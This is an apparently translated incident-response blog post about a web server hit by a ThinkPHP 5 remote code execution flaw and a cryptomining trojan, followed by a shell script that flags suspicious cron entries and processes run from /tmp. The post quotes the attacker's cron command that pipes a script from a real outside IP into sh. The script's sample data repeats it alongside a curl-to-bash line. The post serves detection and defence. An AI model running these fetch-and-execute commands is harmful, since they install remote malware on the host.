Yesterday I discovered that a server had suddenly become slow. top showed several processes each using more than 100% CPU.
The command being executed was:
/tmp/php -s /tmp/p2.conf
It is almost certain that the server has been compromised and a trojan planted.
The next step is to determine the source.
last shows no login records.
I killed these processes first, but they reappeared after a few minutes.
Let's first see what this trojan is trying to do.
netstat showed that the trojan had opened a port and established a connection to an IP address abroad.
But tcpdump showed no data transfer for a while.
What was it trying to do?
Continue checking the logs.
In the cron log I found that the www user had a crontab entry, which is basically the problem:
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
I downloaded a few of the files and took a look. It appears to be a cryptocurrency-mining trojan.
The www user on the server was created when lnmp was installed, so judging by the source, it is probably a web vulnerability.
The php binary under /tmp is owned by www.
Checking the logs of several sites under lnmp shows that it exploited the recently disclosed remote code execution vulnerability in ThinkPHP 5.
Vulnerability details: https://nosec.org/home/detail/2050.html
Fixed the vulnerability and the problem was resolved.
But this site is a test site listening on port 8083. Could it be that attackers are now scanning non-standard ports too?
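As an added triage helper (not from the original post), the following script checks for the two indicators found above: crontab entries that pipe a download into a shell, and processes whose executable lives under /tmp or another world-writable directory. The crontab and ps listings are constructed samples that reuse the cron line quoted in the post; on a live host you would feed it the real output instead.

```shell
#!/bin/sh
# Triage helper flagging the indicators described in the post:
#  1. cron entries that download a script and pipe it straight into sh/bash
#  2. processes executed from /tmp, /var/tmp or /dev/shm

# Constructed sample crontab lines (second line is the one found in the cron log).
SAMPLE_CRON='0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
*/10 * * * * curl -fsSL http://example.invalid/x.sh | bash'

# Constructed sample of `ps -eo user,pid,args` output.
SAMPLE_PS='USER PID ARGS
www 2231 /tmp/php -s /tmp/p2.conf
root 812 /usr/sbin/sshd -D
www 2240 php-fpm: pool www'

# Print cron lines where wget/curl output is piped into a shell.
suspicious_cron() {
    printf '%s\n' "$1" | grep -E '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh'
}

# Print "user pid exe" for processes whose executable sits in a world-writable dir.
tmp_exec_procs() {
    printf '%s\n' "$1" | awk 'NR > 1 && $3 ~ /^\/(tmp|var\/tmp|dev\/shm)\// { print $1, $2, $3 }'
}

# Counters so the result is easy to check programmatically.
count_suspicious_cron() { suspicious_cron "$1" | wc -l | tr -d ' '; }
count_tmp_exec_procs()  { tmp_exec_procs "$1" | wc -l | tr -d ' '; }

# On a real host, replace the samples with live data, e.g.:
#   for u in $(cut -d: -f1 /etc/passwd); do crontab -l -u "$u" 2>/dev/null; done
#   ps -eo user,pid,args
suspicious_cron "$SAMPLE_CRON"
tmp_exec_procs "$SAMPLE_PS"
```

Anything the script prints deserves a closer look: a scheduled download-and-execute under the web server's user, or a binary running from /tmp, is rarely legitimate on a production host.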
Source: https://www.simapple.com/425.html